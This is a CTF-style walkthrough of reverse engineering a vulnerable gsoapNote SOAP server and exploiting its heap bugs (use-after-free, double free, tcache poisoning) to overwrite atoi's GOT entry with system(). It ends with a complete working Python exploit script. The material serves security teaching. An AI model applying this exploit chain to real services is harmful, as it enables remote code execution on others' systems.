Quarrel on the heap. Heap exploitation on a vulnerable SOAP server in Linux

This paper discusses a challenging CTF-like task. Your goal is to get remote code execution on a SOAP server. All exploitation primitives are involved with the heap in one way or another; so, you’ll learn a lot about functions interacting with it. Also, you’ll reverse a Linux binary using a dynamic instrumentation framework.

The authors of this tasks prepared three files for you:

  • ELF binary gsoapNote;
  • ELF binary libc-2.27.so; and 
  • XML file ns.wsdl.

SOAP is an XML-based protocol used for remote procedure calls. The ns.wsdl (Web Services Description Language) describes access to the procedure you have to call. Your goal is to get remote code execution in the gsoapNote SOAP service.

The authors hint that gsoapNote can be run on a Linux PC with the libc-2.27.so library installed. Therefore, you must instruct the GDB debugger to load this binary each time the service starts. To do this, add the following code to .gdbinit:

user@ubuntu: cat .gdbinit
...
set exec-wrapper env 'LD_PRELOAD=./libc-2.27.so'

To extract information from ns.wsdl, use the SOAPUI utility.

SOAPUI automatically generates an XML template for the RPC request. You can immediately see the network interface and port used by the server (localhost:33263), as well as the RPC method (handleCommand()). SOAPUI has no info about arguments yet; so, there is a question mark instead of them.

You run gsoapNote, send the defective template via SOAPUI, and get a meaningful response from the server encoded in Base64:

<resultCode>2</resultCode>

Expectedly, gsoapNote doesn’t like your request…

Time to examine ELF binary mitigation options.

The bad news is that stack canaries protect gsoapNote from buffer overflow on the stack (2 – Canary found) and NX makes some memory pages nonexecutable (3 – NX enabled).

The list of good news is much longer: the RELRO string indicates that you can rewrite the addresses of functions from shared libraries (1 – Partial RELRO) and these addresses won’t be randomized (4 – No PIE) making it easier for you to seize the control. And the best news is that the binary contains symbols (5 – 817 Symbols); this means that you’ll have at least function signatures, which greatly facilitates the reverse.

Reverse engineering

handleCommand

As you remember, gsoapNote contains symbols; so, you load it to IDA and jump to the handleCommand() function.

info

Guys at OALabs use a very handy layout of windows in IDA: windows with disassembled and decompiled listings divide the workspace in half and are synchronized with each other.

It’s not that the decompiled listing is a nightmare – but it’s really difficult to understand what’s going on there. A for loop, a number of nested if conditions, the executeCommand() function takes 9 arguments…

In that situation, I suggest to examine the listing as an Impressionist painting: just take a couple of steps back and look for common patterns.

First, you can see in several places that if the condition in the if statement isn’t met, then the local variable v11 takes the value 2, and a piece of code is skipped. And 2 is the result code received in response to the SOAPUI template. So far, everything adds up.

There is a plenty of code inside the for loop. Let’s examine it in more detail.

The xmlDocGetRootElement() function is called prior to the loop, and the returned structure is used in the for loop. The +24 offset is dereferenced to initialize the counter and the +48 offset, for iteration.

Instead of examining the xmlDocGetRootElement() function, let’s review source code examples that use it. For this purpose, I recommend grep.app. The site provides source code examples from quality repositories containing the feature you are interested in.

Using the link, jump to the selected project repository (I choose lastpass) and examine the source code:

// lastpass xml.c source code
...
#include <libxml/parser.h>
#include <libxml/tree.h>
...
xmlNode *root;
root = xmlDocGetRootElement(doc);
...

Hmm… So, xmlDocGetRootElement() returns a pointer to a structure of the xmlNode type, while the structure itself is defined in libxml. Time to Google libxml and examine the xmlNode structure. The offsets that you’ve seen in the decompiled listing are of special interest.

Let’s convey this knowledge to IDA and create an xmlNode structure using the same principle.

info

You don’t have to reconstruct the entire structure identically. Do this up to the required offset +48 (+0x30).

Now go back to the decompiled listing and assign the type of a pointer to xmlNode to the local variable v16.

$Voila!$ It looks much better and you can see what’s going on in the for loop. gsoapNote parses XML: gets the root node, initializes the counter using its child xmlNode->children, and traverses the nodes adjacent to this child using xmlNode->next. Now strcmp()makes sense: it compares the node name curXmlNode->name with the hardcoded string "array".

Note the parseArray() function: it takes the current XML node and a zeroed twenty-byte array. Most probably, it’s zeroed because the parsing result will be written to it; after all, the parseArray() function has such a name for a reason.

Also note how the parseArray()return code affects the execution flow: if it’s zero, then a function with a curious name executeCommand() is called; otherwise, the program goes to the next node.

You definitely need to get inside executeCommand(), but to do that, you have to parse an array with null return code.

parseArray

The function takes two arguments: a1 and a2. You have already found out that the first one is a pointer to xmlNode, while the second one is a zeroed byte array. To see what’s going on with this array, look at cross-references to a2 in the decompiled listing.

First, note the offsets: +0, +8, +16, and +24. Each subsequent offset is greater than the previous one by the size of QWORD (8 bytes). In other words, this is not a 0x20-byte array, but an array of four QWORDs. By string 85, the entire structure is initialized.

At offsets +0 and +16, there are pointers to strings; at +8 and +24, there are integers.

Assume that parsing results are passed to this structure consisting of four QWORDs. Let’s call it PARSE_RESULT.

Assign the xmlNode type to the argument a1 and the PARSE_RESULT type to a2 and examine parseArray() again. Inside, you will see again a lot of monotonous XML parsing code. Since you have successfully defined types of the input arguments, you can read the decompiled listing almost like the source code.

Further analysis of parseArray() provides a coherent picture of what should be inserted instead of the question mark. I won’t bore you with further parsing; the resultant XML is shown below.

info

The value of the <number> node must be equal to the number of nodes inside the <array> minus one.

Thanks to the correct definition of the structures, static analysis of gsoapNote gives plenty of useful information. Time to continue the study in dynamics. Let’s send the XML shown in the figure above, set a breakpoint at the output of parseArray() (at address 0x403BE2), and check the contents of PARSE_RESULT after parsing the XML from the above request:

# Let's see the contents of PARSE_RESULT after returning from parseArray()
pwndbg> x/4gx $PARSE_RESULT`
0x7ffffffd5a90: 0x00000000006562a0 0x0000000000001000
0x7ffffffd5aa0: 0x00000000006575b0 0x0000000000010000
pwndbg> x/s ((long*)$PARSE_RESULT)[0]
0x6562a0: "AAAAAA"
pwndbg> x/d ((long*)$PARSE_RESULT + 1)
0x7ffffffd5a98: 4096
pwndbg> x/s ((long*)$PARSE_RESULT)[2]
0x6575b0: "BBBBBB"
pwndbg> x/d ((long*)$PARSE_RESULT + 3)
0x7ffffffd5aa8: 65536
# The contents are fully consistent with SOAPUI crafted XML
# But the result code (-1) is not what you need...
pwndbg> i r rax
rax 0xffffffff

It’s always a pleasure to watch how the data you control are copied into process memory. All fields of the PARSE_RESULT structure are initialized, which means that almost all the code of the parseArray() function has been executed. Too bad, the return code is -1, which prevents you from moving on…

Let’s find out what’s the problem. Of course, you can start executing the code in the debugger step-by-step, but that’s too long. To do this quickly, in one click, highlight the executed code using DynamoRIO.

DynamoRIO is a framework used to develop dynamic analysis tools. The drcov tool embedded in it will show all executed instructions.

info

If, for some reason, you decide to solve this problem in the debugger, I recommend using a custom GDB command called step before. You enter sb in the console and set a break before the call instruction. This will expedite the debugging process.

Run gsoapNote under the drcov instrumentation as follows:

<path to DynamoRIO>/bin64/drrun -t drcov - gsoapNote

Send XML via SOAPUI again and kill the drrun process.

drrun has generated a drcov.gsoapNote.X.Y.proc.log file containing addresses of the executed instructions. To view this file, use the lighthouse plugin for IDA.

info

At the time of writing, the latest version of DynamoRIO was 9.0 with drcov v. 3. Too bad, lighthouse can’t parse version 3 files; so, I use version 8.0 with drcov v. 2.

Executed instructions are highlighted in green. The above screenshot shows the moment when you exit with a return code of -1. This happens because the value inside <bulkString><number> is not equal to the length of the <bulkString><content> string. So, you correct the XML in SOAPUI, execute parseArray(), and get into executeCommand(). Success!

executeCommand

This is the function with nine arguments that looked so scary at the very beginning. But is the number of its arguments really so large?

executeCommand((int)s, (int)"show", v3, v4, v5, v6, v18.pzStr1, v18.num1, (__int64)v18.pzStr2);

Let’s collect more information from the disassembler listing. So far, Linux binary gsoapNote had used the System V calling convention: the first six arguments are passed via the rdi, rsi, rdx, rcx, r8, and r9 registers; the rest, via the stack in reverse order.

# Passing arguments in executeCommand()
mov rax, [rbp+s]
push [rbp+var_68] ; stack arg
push [rbp+var_70] ; stack arg
push [rbp+var_78] ; stack arg
push [rbp+var_80] ; stack arg
mov rdi, rax ; register arg
call executeCommand

You can see initialized rdi and four arguments on the stack. Now let’s see what happens with registers-arguments inside executeCommand()

mov [rbp+var_8], rdi ; rdi saved
mov esi, offset s2 ; rsi overwritten
mov rdx, [rbp+arg_10] ; rdx overwritten
mov rcx, rax ; rcx overwritten

Some of them aren’t used and are immediately overwritten! The compiler has optimized the function call. As you can see, if functions are called inside a binary, the compiler doesn’t necessarily have to comply with System V. IDA wasn’t aware of this and showed nine arguments in the decompiled listing.

www

Compiler optimizations are addressed in detail in the lecture “Unbolting the Compiler’s Lid” by Matt Godbolt. I especially like the example where the compiler optimizes a function that adds together elements of an array [1, 2, 3 ... N]. The developer uses a for loop, but the compiler – who is smarter than the developer! – uses the formula that calculates the sum of an arithmetic progression: N(N+1)/2. You can also learn from Matt about the Compiler Explorer tool.

Let’s watch in dynamics what four arguments are put on the stack. Set a breakpoint on the call executeCommand instruction at 0x403CE4.

info

The above screenshot shows the pwbdbg plugin. Note that pwndbg dereferences the stack, which is incredibly handy. It also includes many other useful plugins; one of them will be used later.

Do you recognize these data? The PARSE_RESULT structure is on the stack, and a pointer to the zeroed array 0xF0 in length is in rdi. In other words, the optimization is as follows: four QWORDs of the PARSE_RESULT structure are put on the stack, and only rdi is used from registers. Let’s convey this knowledge to IDA by defining the calling convention manually. You have to define the function type in the decompiled listing.

How it was before:

__int64 __fastcall executeCommand(__int64 a1, int a2, int a3, int a4, int a5, int a6, char *command, __int64 a8, __int64 a9)

How it is now:

__int64 __usercall executeCommand@<rax>(PARSE_RESULT pr, void *pArray_F0@<rdi>)

Now you can treat the decompiled executeCommand() listing as source code.

It immediately becomes clear what fields of the PARSE_RESULT structure are used by specific functions and that PARSE_RESULT.pzStr1 is the name of the command (where you had "AAAAAAA").

Now all you have to find out is: what is the array whose length is 0xF0? It’s of interest because it’s passed to each of the functions newNote(), editNote(), and deleteNote() together with PARSE_RESULT. Since its length is 0xF0, let’s call it foo, even though you are now working in C, not in Python.

I take the easiest way by choosing deleteNote

deleteNote

Let’s examine the short and nicely looking decompiled deleteNote code.

In string 3, you see that foo is an array of pointers, while num2 is the index of this array; the index can take on values from 0 to 9 inclusive.

In string 5, the pointer is dereferenced, and the program checks whether the QWORD at offset +16 is equal to zero (let’s call this memory area bar). If not, then free() is called followed by an unconditional free() call to the pointer at index num2. The scheme is shown below (data that you control from XML are highlighted in red; what is passed to free(), in gray).

When you see free() in C code, you have to pay attention to what happens with the freed pointer next. In this particular case, nothing happens (although in a perfect world, it must be zeroed). Nothing prevents you from calling deleteNote() twice with the same index. This gives you the first primitive: double free.

editNote

The amount of code in editNote() is larger, but you already know something about the ‘foo bar’.

The program checks whether the index is in the range from 0 to 9. You have already seen this in deleteNote(). You get the first QWORD from bar and compare it with the length of your XML string after decoding it from Base64.

If this QWORD is longer than the string length, you copy the string to bar. A logical check for buffer overflow. The scheme used to store your notes finally becomes more or less clear. Let’s return the ‘foo bars’ to Python adepts and give meaningful names associated with notes. For instance, foo is an array of pointers to the NOTE_ENTRY note structure in bar.

newNote

Now you have to find out what is located at NOTE_ENTRY offsets +8, +24, +32, etc.

Offsets +24 and further are of no interest because only 24 bytes are allocated for the structure; in other words, the last significant QWORD is located at offset +16.

The number that was interpreted as an index in previous functions is written at offset +8; then this number is passed to malloc(), and the returned pointer is written to pText. In the newNote()context, it’s no longer an index, but the note size.

Next, a string from XML (decoded from Base64) is copied to pText, and the length of this string determines the number of bytes copied to memcpy(). The size of the allocated buffer and the size of the copied data may not match. A classical vanilla buffer overflow. In this particular case, on the heap.

Note that you control the size argument for malloc(). This allows you to choose the glibc memory allocation strategy.

info

The malloc() implementation in glibc supports linked lists (i.e. bins) for memory chunks of different sizes. The behavior of free() in relation to these bins is also different. The exploit you’re about to write will use this feature.

show

executeCommand() contains one more command: show. gsoapNote allows you to create, delete, and edit notes; therefore, such a command is absolutely mandatory.

Now you know all the NOTE_ENTRY fields and can easily understand what’s going on there: based on its index, the note is encoded in Base64 and returned to the user. Since the pointer isn’t zeroed after the deletion with deleteNote(), an opportunity to use after free arises: you can read the memory after free().

Reverse results

To make sure that you understand the commands correctly, let’s perform a simple task: create the AAAAAA note, edit it to get the BBB note, show it, and then delete.

Great! Everything works as expected.

Analyzing primitives

Time to examine the existing primitives and find out how to exploit the vulnerability.

UAF (use-after-free)

This sequence of commands gives you a memory leak primitive that can be used to bypass ASLR. It’s described in more detail in an earlier article. In brief, it works as follows:

  • using the new command, you create a large chunk;
  • using the delete command, you free it where the note text used to be; free()writes a pointer to glibc; and 
  • using show, you read this pointer.

A POC in SOAPUI looks as follows.

Elixir Cross Referencer

If you are interested in the glibc code, I strongly recommend the elixir.bootlin.com resource. It’s like an IDE in your browser. Also, you can find there any version of the library. For instance, this is the place where a pointer to glibc unsorted bin is written during the execution of free().

Heap overflow

In this particular case, it’s not that easy to sploit heap overflow. There is one point that I deliberately missed in the Reverse Engineering section: each XML request creates a new pNOTE_ENTRY[] array in the heap. In other words, if you create a note in the first XML, it won’t be available from the second request.

For instance, to exploit the House of Force technique, you need the address of the top_chunk global structure. Knowing it, you calculate size for malloc(), which triggers int ovferflow in malloc(), and the function returns the pointer you control. Prior to this, you have to overwrite the top_chunk.size field using heap overflow to ensure that the code execution continues to the point where int overflow occurs.

Assume that somehow you managed to link the heap address with the first XML request, calculated the required size value, and then sent the second XML request. malloc() will be called several times during the SOAP request processing, then another malloc()will be called for the pNOTE_ENTRY[] array. As a result, by the time of exploitation, the computed value will become invalid, and it’s difficult to predict it. More information on this can be found here. So, let’s put this primitive aside and look for something else.

Unobvious UAF and tcachebins

Tcache was added to glibc 2.26 to speed up malloc().You have to understand that:

  • for each thread, glibc allocates several singly-linked lists (i.e. tcachebins) for chunks of different sizes;
  • free() adds the freed pointer to the beginning of the list; and 
  • malloc() takes a pointer from the beginning of the list.

Imagine the following starting conditions: the tcache list is empty, and you’ve created a note whose size is equal to 0x17. The glibc data are highlighted in yellow; the data you control, in red.

Now let’s call the delete command. Two pointers will be freed and added to the tcache linked list.

Remember the check in editNote(): the length of the new note must be less than the textLen of the original one? Now a pointer to a memory area is in place of textLen, and the value of this pointer is definitely greater than the length of the new note.

In other words, you can still edit the last element in the linked list using the edit command.

After the editing, glibc will think that the tcache linked list consists of three elements. Accordingly, the third malloc()will return the pointer you control. A prerequisite for this is that the size of all three malloc()functions must be suitable for the tcache small bin.

You have to ensure that the third malloc() is called in the new command, and the next call will be memcpy() of your data. This is how you get a powerful RW primitive.

Note that the size value is a very important factor. See what happens if size becomes, for instance, 0x20. In this case, the textLen pointer will be zeroed.

The UAF capability of the edit command is lost: zero will always be less than the length of the new note. Even if free() is called later in the code, the new element will be added at the beginning of the list. The field you need will always be zero.

A POC in SOAPUI looks as follows.

info

Here you see the output of the tcachebins plugin embedded in pwndbg: it clearly shows what is stored in the linked list. Also, if you don’t want to study tcachein theglibc` source code, you can examine the plugin code in Python.

To simplify debugging, I’ve logged malloc() calls in newNote(). See what addresses are returned by corrupted glibc:

New note - malloc size 0x18, addr 0x650390
New note - malloc size 0x400, addr 0x64acc0
New note - malloc size 0x18, addr 0x650030
New note - malloc size 0x8, addr 0x7ffff746d000 <--- The address you've set in the edit function

So, you’ve got a gun that shoots 8 bytes at the controlled address! But where to shoot?

Building exploit

When I was thinking how to use these primitives, my ideas were mostly primitive. Well, you can write eight bytes to an arbitrary address… You have to seize control… You can rewrite the pointer to some function, remove the heap NX using ROP gadgets, write shellcode there…

Then I stumbled upon a Chinese write-up of the same CTF. I couldn’t resist and read it. The exploit was so elegant that I decided to use it.

The problem is that when I was thinking about the exploit, I completely ignored an important fact: the binary execution continues up to the fourth malloc(). And in the meantime, the XML processing continues, and new calls to glibc functions are made!

The second important fact is the absence of RELRO in the binary. This means that you can shoot at the .got.plt section. atoi() is the ideal target since this function takes a string as an input argument and system() takes the same argument.

The payload is delivered by the next XML node (<array>): after overwriting .got.plt, it will call system() with the string under your control.

So, the final exploit, combines two PoCs. This means that you have to send two XML messages. The first one has to leak the address of glibc. Knowing the address of glibc, you can calculate the VA of the system() function. The address of the pointer to atoi() in the .got.plt section of the binary is already known (at the very beginning of the article, I showed that gsoapNote was built without ASLR). In the second message, you use the RW primitive to overwrite atoi() with system() and run the payload.

Running exploit

Let’s see whether it works!

user@ubuntu$ python3 exploit.py
[+] Stage I. Craft xml to leak libc address
[+] libc address is 0x7f5078132000
 
[+] Stage II. Calculate required addresses and trigger RCE
[+] system address is 0x7f50781814e0
[+] atoi .got.plt address is 0x6372b8
[+] trigger RCE

RCE confirmation on the server:

user@ubuntu:gsoapnote$ sudo ps aux --forest
...
\_ ./gsoapNote
\_ sleep 999 # Payload has been executed successfully

Conclusions

Congrats! You have completed a challenging task, learned the heap management implementation in glibc, and gained practical experience with a number of useful tools.

If you want more practice, try to write an exploit using the heap overflow primitive.

The full code of the UAF exploit is provided below.

import base64
import socket
import re
import struct
def soap_message(array):
return f"""
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:note">
<soapenv:Header/>
<soapenv:Body>
<urn:handleCommand soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<commandXml xsi:type="xsd:string">
<commandSeq>
{"".join(array)}
</commandSeq>
</commandXml>
</urn:handleCommand>
</soapenv:Body>
</soapenv:Envelope>
"""
def new_note(content, size=None):
contentBase64 = base64.b64encode(content)
if not size:
size = len(content)
return f"""
<array>
<number>3</number>
<simpleString>
<content>new</content>
</simpleString>
<integer>
<content>{size}</content>
</integer>
<bulkString>
<content>{contentBase64.decode()}</content>
<number>{len(contentBase64)}</number>
</bulkString>
</array>
"""
def edit_note(content, note_index):
contentBase64 = base64.b64encode(content)
return f"""
<array>
<number>3</number>
<simpleString>
<content>edit</content>
</simpleString>
<integer>
<content>{note_index:d}</content>
</integer>
<bulkString>
<content>{contentBase64.decode()}</content>
<number>{len(contentBase64)}</number>
</bulkString>
</array>
"""
def show_note(note_index):
return f"""
<array>
<number>2</number>
<simpleString>
<content>show</content>
</simpleString>
<integer>
<content>{note_index:d}</content>
</integer>
</array>
"""
def delete_note(note_index):
return f"""
<array>
<number>2</number>
<simpleString>
<content>delete</content>
</simpleString>
<integer>
<content>{note_index:d}</content>
</integer>
</array>
"""
def payload(system_command):
return f"""
<array>
<number>{system_command}</number>
</array>
"""
def send_to_gsoapnote(command_array):
msg = soap_message(command_array)
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('localhost', 33263))
sock.send(bytes(msg, 'ascii'))
response = sock.recv(1024).decode()
sock.close()
try:
result = re.findall(r"(?<=<result>).*(?=</result>)", response, flags=re.IGNORECASE)[0]
result = base64.b64decode(result)
print(result)
except:
pass
try:
result = re.findall(r"(?<=<msg>).*(?=</msg>)", result.decode(), flags=re.IGNORECASE)[0]
result = base64.b64decode(result)
except:
pass
return result
def libc_leak():
free_and_show = (
new_note(b'E'*8, 1281),
delete_note(0),
show_note(0)
)
response = send_to_gsoapnote(free_and_show)
fd_pointer = struct.unpack("<Q", response)[0]
return fd_pointer - 0x3ec2c0
def exploit_tcache_linked_list(addr, value, system_command):
tcache_exploit_commands = (
new_note(b'A'*8, 0x17),
delete_note(0),
edit_note(struct.pack('Q', addr), 0),
new_note(b'C'*8, 0x30),
new_note(struct.pack('Q', value), 8),
payload(system_command)
)
response = send_to_gsoapnote(tcache_exploit_commands)
if __name__ == '__main__':
print('[+] Stage I. Craft xml to leak libc address')
libc_addr = libc_leak()
print(f'[+] libc address is {hex(libc_addr)}')
print('[+] Stage II. Calculate required addresess and trigger RCE')
system_func_addr = libc_addr + 0x4f4e0
atoi_plt_addr = 0x6372b8
print(f'[+] system address is {hex(system_func_addr)}')
print(f'[+] atoi .got.plt address is {hex(atoi_plt_addr)}')
print('[+] trigger RCE')
exploit_tcache_linked_list(atoi_plt_addr, system_func_addr, "sleep 999")


Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>